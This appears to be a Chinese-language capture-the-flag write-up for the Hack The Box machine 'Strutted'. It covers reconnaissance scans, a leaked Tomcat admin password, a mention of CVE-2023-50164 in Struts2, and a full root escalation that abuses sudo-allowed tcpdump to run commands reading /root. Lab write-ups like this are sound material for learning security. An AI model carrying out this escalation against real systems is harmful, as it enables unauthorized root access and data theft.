HTB Strutted

, ,

靶机ip :

1
10.10.11.59

nmap 扫描情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿Hack3rr)-[~]
└─$ nmap -A -Pn -sC -sV 10.10.11.59
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-11 23:43 CST
Nmap scan report for 10.10.11.59
Host is up (0.10s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://strutted.htb/
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   142.60 ms 10.10.16.1
2   100.45 ms 10.10.11.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.88 seconds

web信息

1
2
3
┌──(kali㉿Hack3rr)-[~]
└─$ whatweb ' http://strutted.htb/'
http://strutted.htb/ [200 OK] Bootstrap, Content-Language[en-US], Cookies[JSESSIONID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], HttpOnly[JSESSIONID], IP[10.10.11.59], Java, Script, Title[Strutted™ - Instant Image Uploads], UncommonHeaders[cross-origin-embedder-policy-report-only,cross-origin-opener-policy], nginx[1.18.0]

目录信息

1
2
3
4
5
6
7
[23:45:57] Starting:
[23:46:09] 400 -    2KB - /\..\..\..\..\..\..\..\..\..\etc\passwd
[23:46:10] 400 -    2KB - /a%5c.aspx
[23:46:11] 200 -    6KB - /about
[23:46:39] 200 -   38MB - /download
[23:47:08] 200 -    4KB - /s/sfsites/aura

/download.action可以下载源码直接dump下来发现是struts2,又是java历史上的漏洞王之一了!

密码:

1
2
3
4
5
6
7
<?xml version='1.0' encoding='utf-8'?>  
  
<tomcat-users>  
    <role rolename="manager-gui"/>  
    <role rolename="admin-gui"/>  
    <user username="admin" password="skqKY6360z!Y" roles="manager-gui,admin-gui"/>  
</tomcat-users>

sturts2受到 CVE-2023-50164 影响

回去好好调试一下这个洞吧~
先拿poc打了

407cebe31d35183bac1bd3e99ec5b681

sudo -l 提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
james@strutted:~$ sudo -l
Matching Defaults entries for james on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User james may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/sbin/tcpdump
james@strutted:~$ COMMAND='ls /root&&cat /root/*'
james@strutted:~$ TF=$(mktemp)
james@strutted:~$ echo "$COMMAND" > $TF
james@strutted:~$ chmod +x $TF
james@strutted:~$ sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Maximum file limit reached: 1
1 packet captured
4 packets received by filter
0 packets dropped by kernel
james@strutted:~$ ls
user.txt
james@strutted:~$ COMMAND='ls /root&&cat /root/* > /tmp/1'
james@strutted:~$ sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Maximum file limit reached: 1
1 packet captured
4 packets received by filter
0 packets dropped by kernel
root.txt
cb48c2a5f7a41ff6b7bfdb6172307ab1
james@strutted:~$

很ez!!
cb48c2a5f7a41ff6b7bfdb6172307ab1